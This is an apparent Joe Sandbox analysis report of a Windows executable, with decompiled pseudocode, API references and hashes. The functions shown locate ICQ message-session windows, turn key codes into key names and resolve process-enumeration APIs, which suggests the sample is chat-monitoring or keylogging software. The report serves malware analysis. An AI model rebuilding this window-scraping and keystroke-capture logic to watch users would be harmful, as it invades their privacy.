API ID: #2446$#1199#2086#2646#2864#3097#5162#540#641#800H_prologMessageParentSend
String ID:
API String ID: 1983238032-0
Opcode ID: cb07e8e99dd1db96753badfd01fae25b36d3d500a1d16f3542bdea37493342e0
Instruction ID: ca67f9a5c951b91e0882bd7208b66c6f2bd628a912b65fa7c32d89b1cda89005
Opcode Fuzzy Hash: cb07e8e99dd1db96753badfd01fae25b36d3d500a1d16f3542bdea37493342e0
Instruction Fuzzy Hash: 1421C571A01224ABDB14F7F5CC46BEE7778AF08328F10062EF122A71D2DFB859058B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E116, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0040E116(intOrPtr __ecx) {
				intOrPtr* _t32;
				intOrPtr _t34;
				void* _t37;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t52;
				void* _t55;

				E0043E4E0(0x4400db, _t55);
				_push(__ecx);
				_push(__ecx);
				_t34 = __ecx;
				 *((intOrPtr*)(_t55 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x446b68;
				_t52 = __ecx + 0x64;
				 *(_t55 - 4) = 5;
				if(_t52 != 0 &&  *((intOrPtr*)(_t52 + 4)) != 0) {
					L0043DD72();
				}
				_t37 = _t34 + 0x54;
				if(_t37 != 0 &&  *((intOrPtr*)(_t37 + 4)) != 0) {
					L0043DD72();
				}
				_t38 = _t34 + 0x5c;
				if(_t38 != 0 &&  *((intOrPtr*)(_t38 + 4)) != 0) {
					L0043DD72();
				}
				 *(_t55 - 4) = 4;
				L0043DD36();
				_t40 = _t52;
				 *((intOrPtr*)(_t55 - 0x10)) = _t40;
				 *_t40 = 0x445440;
				 *(_t55 - 4) = 6;
				L0043DD72();
				_t41 = _t34 + 0x5c;
				 *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x10)))) = 0x44547c;
				 *((intOrPtr*)(_t55 - 0x10)) = _t41;
				 *_t41 = 0x445440;
				 *(_t55 - 4) = 7;
				L0043DD72();
				_t42 = _t34 + 0x54;
				 *((intOrPtr*)(_t55 - 0x10)) = _t42;
				 *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x10)))) = 0x44547c;
				 *_t42 = 0x445440;
				 *(_t55 - 4) = 8;
				L0043DD72();
				_t32 =  *((intOrPtr*)(_t55 - 0x10));
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				 *_t32 = 0x44547c;
				L0043DD36();
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				L0043DF70();
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t32;
			}

0x0040e11b
0x0040e120
0x0040e121
0x0040e123
0x0040e127
0x0040e12a
0x0040e130
0x0040e137
0x0040e13e
0x0040e147
0x0040e147
0x0040e14c
0x0040e151
0x0040e158
0x0040e158
0x0040e15d
0x0040e162
0x0040e169
0x0040e169
0x0040e171
0x0040e175
0x0040e17a
0x0040e181
0x0040e184
0x0040e186
0x0040e18a
0x0040e197
0x0040e19a
0x0040e19c
0x0040e19f
0x0040e1a1
0x0040e1a5
0x0040e1ad
0x0040e1b0
0x0040e1b3
0x0040e1b5
0x0040e1b7
0x0040e1bb
0x0040e1c0
0x0040e1c3
0x0040e1ca
0x0040e1cc
0x0040e1d1
0x0040e1d7
0x0040e1e2
0x0040e1ea

APIs

__EH_prolog.LIBCMT ref: 0040E11B
#2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E147
#2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E158
#2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E169
#800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E175
#2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E18A
#2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1A5
#2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1BB
#800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1CC
#795.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1D7

Strings

@TD, xrefs: 0040E17C
|TD, xrefs: 0040E192

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2414$#800$#795H_prolog
String ID: @TD$|TD
API String ID: 327448584-1054255851
Opcode ID: 230b27221330b09a70ab0ab03d735983661748d236a00f15ddf8403c995f5eaf
Instruction ID: 77227a77602e3a545daa45990097c19d7e20c6d63a073472985e9dedc9cd258c
Opcode Fuzzy Hash: 230b27221330b09a70ab0ab03d735983661748d236a00f15ddf8403c995f5eaf
Instruction Fuzzy Hash: B121B2B0D01650CBCB15EF5AD5812AEFBB0BF4A308F14459FE4056B392C7785B05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040912B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040912B(void* __ecx) {
				signed int _t22;
				void* _t24;
				struct HWND__* _t25;
				signed int _t27;
				char _t29;
				CHAR* _t41;
				void* _t45;

				E0043E4E0(0x43f760, _t45);
				if( *(_t45 + 8) != 0) {
					if(strncmp( *(_t45 + 0xc), "#32770", 6) != 0) {
						goto L1;
					} else {
						_push( *(_t45 + 8));
						_push(_t45 - 0x10);
						_t24 = E0040FEA7();
						_push("Message Session");
						 *(_t45 - 4) = 0;
						L0043DFD6();
						if(_t24 != 0) {
							L5:
							 *((char*)(_t45 + 0xf)) = 0;
						} else {
							_t27 = FindWindowExA( *(_t45 + 8), 0, "Button", "ICQ");
							asm("sbb al, al");
							_t29 =  ~_t27 + 1;
							 *((char*)(_t45 + 0xf)) = _t29;
							 *((char*)(_t45 + 0xf)) = 1;
							if(_t29 == 0) {
								goto L5;
							}
						}
						 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
						L0043DD36();
						if( *((intOrPtr*)(_t45 + 0xf)) != 0) {
							goto L1;
						} else {
							_t41 = "RichEdit20A";
							_t25 = FindWindowExA( *(_t45 + 8), 0, _t41, 0);
							if(_t25 == 0) {
								goto L1;
							} else {
								_t22 = FindWindowExA( *(_t45 + 8), _t25, _t41, 0) & 0xffffff00 | _t26 != 0x00000000;
							}
						}
					}
				} else {
					L1:
					_t22 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t22;
			}

0x00409130
0x0040913e
0x0040915c
0x00000000
0x0040915e
0x0040915e
0x00409164
0x00409165
0x0040916c
0x00409173
0x00409176
0x00409183
0x004091a4
0x004091a4
0x00409185
0x00409193
0x00409197
0x00409199
0x0040919b
0x0040919e
0x004091a2
0x00000000
0x00000000
0x004091a2
0x004091a7
0x004091ae
0x004091b6
0x00000000
0x004091b8
0x004091b8
0x004091c3
0x004091c7
0x00000000
0x004091cd
0x004091d7
0x004091d7
0x004091c7
0x004091b6
0x00409140
0x00409140
0x00409140
0x00409140
0x004091e0
0x004091e8

APIs

__EH_prolog.LIBCMT ref: 00409130
strncmp.MSVCRT(?,#32770,00000006), ref: 00409151
#2764.MFC42(Message Session), ref: 00409176
FindWindowExA.USER32 ref: 00409193
#800.MFC42(Message Session), ref: 004091AE
FindWindowExA.USER32 ref: 004091C3
FindWindowExA.USER32 ref: 004091D3

Strings

#32770, xrefs: 00409149
Message Session, xrefs: 0040916C
RichEdit20A, xrefs: 004091B8, 004091BE, 004091CE
ICQ, xrefs: 00409185
Button, xrefs: 0040918A

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$#2764#800H_prologstrncmp
String ID: #32770$Button$ICQ$Message Session$RichEdit20A
API String ID: 3274652419-1580816384
Opcode ID: df3a118b4bf585344daec92f6391a6ffc5bc57e04ddc6eaa0f364a1d2bac83cb
Instruction ID: 5b2b01ec5e7f7adfb6ed64922fbbaf6d2810a451a537c5d0adcfe48377672826
Opcode Fuzzy Hash: df3a118b4bf585344daec92f6391a6ffc5bc57e04ddc6eaa0f364a1d2bac83cb
Instruction Fuzzy Hash: D111E731A01249FEEF119F61CC45EAF7B58EF55399F10803AF8056A1D2D3388E04D618

Uniqueness

Uniqueness Score: -1.00%

Function 00420806, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 64
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00420806(void* __ecx) {
				long _t31;
				int _t32;
				void* _t35;
				void* _t36;
				void* _t47;
				void* _t49;

				E0043E4E0(0x441f2c, _t49);
				_t47 = __ecx;
				_t31 = MapVirtualKeyExA( *(_t49 + 8) & 0x000000ff, 0, GetKeyboardLayout(0)) << 0x00000010 | 0x00000001;
				if( *(_t49 + 8) >= 0x21 &&  *(_t49 + 8) <= 0x2f) {
					_t31 = _t31 | 0x01000000;
				}
				_t32 = GetKeyNameTextA(_t31, _t49 - 0x58, 0x40);
				if(_t32 != 0) {
					_push(_t49 - 0x58);
					L0043DE26();
					 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
					_push(_t49 - 0x10);
					_t35 = _t49 - 0x14;
					_push(0x5b);
					_push(_t35);
					L0043E348();
					_push(0x5d);
					_push(_t35);
					_t36 = _t49 + 8;
					 *(_t49 - 4) = 1;
					_push(_t36);
					L0043E14A();
					_push(_t36);
					 *(_t49 - 4) = 2;
					L0043DFCA();
					 *(_t49 - 4) = 1;
					L0043DD36();
					 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
					L0043DD36();
					_t32 = E004207D4(_t47,  *((intOrPtr*)(_t49 - 0x10)));
					 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t32;
			}

0x0042080b
0x00420814
0x0042082f
0x00420835
0x0042083d
0x0042083d
0x00420849
0x00420851
0x00420859
0x0042085a
0x0042085f
0x00420866
0x00420867
0x0042086a
0x0042086c
0x0042086d
0x00420872
0x00420874
0x00420875
0x00420878
0x0042087c
0x0042087d
0x00420882
0x00420886
0x0042088a
0x00420892
0x00420896
0x0042089b
0x004208a2
0x004208ac
0x004208b1
0x004208b8
0x004208b8
0x004208c1
0x004208c9

APIs

__EH_prolog.LIBCMT ref: 0042080B
GetKeyboardLayout.USER32 ref: 00420818
MapVirtualKeyExA.USER32(?,00000000,00000000), ref: 00420826
GetKeyNameTextA.USER32 ref: 00420849
#537.MFC42(?), ref: 0042085A
#925.MFC42(?,0000005B,?,?), ref: 0042086D
#923.MFC42(00000021,00000000,0000005D,?,0000005B,?,?), ref: 0042087D
#858.MFC42(00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 0042088A
#800.MFC42(00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 00420896
#800.MFC42(00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 004208A2
#800.MFC42(?,00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 004208B8

Strings

/, xrefs: 00420837

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#858#923#925H_prologKeyboardLayoutNameTextVirtual
String ID: /
API String ID: 1013038102-2043925204
Opcode ID: a381b6b9d22a8fb6ad50094ef6fac45cc354a907be07a4e1c16cca15f7864a8e
Instruction ID: e91744a518f7e3501b3cb1d93298473eb43898da4bf943b5a7f6b99c42836973
Opcode Fuzzy Hash: a381b6b9d22a8fb6ad50094ef6fac45cc354a907be07a4e1c16cca15f7864a8e
Instruction Fuzzy Hash: C721C3B1D00259AAEF11EBE1C80ABEFBF78AF15344F14445EF511A21C2DB789704CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00428827, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428827() {
				_Unknown_base(*)()* _t7;
				void* _t8;
				struct HINSTANCE__* _t9;

				_t9 = GetModuleHandleA("KERNEL32.DLL");
				if(_t9 == 0) {
					L7:
					return 0;
				} else {
					 *0x455b8c = GetProcAddress(_t9, "CreateToolhelp32Snapshot");
					 *0x455b90 = GetProcAddress(_t9, "Module32First");
					 *0x455b94 = GetProcAddress(_t9, "Module32Next");
					 *0x455b98 = GetProcAddress(_t9, "Process32First");
					_t7 = GetProcAddress(_t9, "Process32Next");
					 *0x455b9c = _t7;
					if( *0x455b90 == 0 ||  *0x455b94 == 0 ||  *0x455b98 == 0 || _t7 == 0 ||  *0x455b8c == 0) {
						goto L7;
					} else {
						_t8 = 1;
						return _t8;
					}
				}
			}

0x00428833
0x00428837
0x004288af
0x004288b2
0x00428839
0x0042884e
0x0042885b
0x00428868
0x00428875
0x0042887a
0x00428883
0x00428889
0x00000000
0x004288aa
0x004288ac
0x004288ae
0x004288ae
0x00428889

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041FE59), ref: 0042882D
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00428846
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00428853
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00428860
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0042886D
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0042887A

Strings

CreateToolhelp32Snapshot, xrefs: 00428840
Process32First, xrefs: 00428862
Module32First, xrefs: 00428848
Module32Next, xrefs: 00428855
KERNEL32.DLL, xrefs: 00428828
Process32Next, xrefs: 0042886F

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$KERNEL32.DLL$Module32First$Module32Next$Process32First$Process32Next
API String ID: 667068680-2096788425
Opcode ID: 9ba64fbbe09a19a617339d882a063d79c8c7cb97a90908c36c6f33e9e35bffea
Instruction ID: cc7b184a48323da2091fa4ad70c40b7f8c90e7428d5005af2d79f0672d1736af
Opcode Fuzzy Hash: 9ba64fbbe09a19a617339d882a063d79c8c7cb97a90908c36c6f33e9e35bffea
Instruction Fuzzy Hash: 33014471A0171499D7206BA9BC5D72B7EB4ABC1B56F94003FA404961E3DBB89484CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 004208E1, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004208E1(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x004208e1
0x004208eb
0x004208f0
0x004208fa
0x004208ff
0x00420909
0x0042090e
0x00420918
0x0042091d
0x00420927
0x0042092c
0x00420936
0x0042093b

APIs

#537.MFC42(None,004208DC), ref: 004208EB
#537.MFC42(User defined,None,004208DC), ref: 004208FA
#537.MFC42(Open,User defined,None,004208DC), ref: 00420909
#537.MFC42(Print,Open,User defined,None,004208DC), ref: 00420918
#537.MFC42(Explore,Print,Open,User defined,None,004208DC), ref: 00420927
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,004208DC), ref: 00420936

Strings

Open, xrefs: 004208FF
E-mail, xrefs: 0042092C
Explore, xrefs: 0042091D
Print, xrefs: 0042090E
User defined, xrefs: 004208F0
None, xrefs: 004208E1

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-3616938308
Opcode ID: 4a8a22de88ef76a2bfab6a0586c7707e5de2535b0d215606727d881d4494e333
Instruction ID: 6120b2addace4222eaaeac37d44fe7698a3086c8b87ceff3d6e34201199b1112
Opcode Fuzzy Hash: 4a8a22de88ef76a2bfab6a0586c7707e5de2535b0d215606727d881d4494e333
Instruction Fuzzy Hash: F5D06200F41D519215187E65E47393D5802C7DC7D7760A31F7D021E1C38D4C0E5C426D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1DD, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040C1DD(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0040c1dd
0x0040c1e7
0x0040c1ec
0x0040c1f6
0x0040c1fb
0x0040c205
0x0040c20a
0x0040c214
0x0040c219
0x0040c223
0x0040c228
0x0040c232
0x0040c237

APIs

#537.MFC42(None,0040C1D8), ref: 0040C1E7
#537.MFC42(User defined,None,0040C1D8), ref: 0040C1F6
#537.MFC42(Open,User defined,None,0040C1D8), ref: 0040C205
#537.MFC42(Print,Open,User defined,None,0040C1D8), ref: 0040C214
#537.MFC42(Explore,Print,Open,User defined,None,0040C1D8), ref: 0040C223
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0040C1D8), ref: 0040C232

Strings

Open, xrefs: 0040C1FB
E-mail, xrefs: 0040C228
Explore, xrefs: 0040C219
Print, xrefs: 0040C20A
User defined, xrefs: 0040C1EC
None, xrefs: 0040C1DD

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-3616938308
Opcode ID: ccda3bbabe923e6d9bd632eb6c203bb9a2490e24ff978b52aad828c7e19f6287
Instruction ID: e4fe4bb020ec346e5e4ffff844239034bfe20aff44d8361f20ff764548cddc28
Opcode Fuzzy Hash: ccda3bbabe923e6d9bd632eb6c203bb9a2490e24ff978b52aad828c7e19f6287
Instruction Fuzzy Hash: ACD0B200F54F40E245147E61E43353D5942DB9CFC7B90A56FBD051E1E38DCC5A1C462D

Uniqueness

Uniqueness Score: -1.00%

Function 00418DE2, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00418DE2(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x00418de2
0x00418dec
0x00418df1
0x00418dfb
0x00418e00
0x00418e0a
0x00418e0f
0x00418e19
0x00418e1e
0x00418e28
0x00418e2d
0x00418e37
0x00418e3c

APIs

#537.MFC42(None,00418DDD), ref: 00418DEC
#537.MFC42(User defined,None,00418DDD), ref: 00418DFB
#537.MFC42(Open,User defined,None,00418DDD), ref: 00418E0A
#537.MFC42(Print,Open,User defined,None,00418DDD), ref: 00418E19
#537.MFC42(Explore,Print,Open,User defined,None,00418DDD), ref: 00418E28
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,00418DDD), ref: 00418E37

Strings

Open, xrefs: 00418E00
E-mail, xrefs: 00418E2D
Explore, xrefs: 00418E1E
Print, xrefs: 00418E0F
User defined, xrefs: 00418DF1
None, xrefs: 00418DE2

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
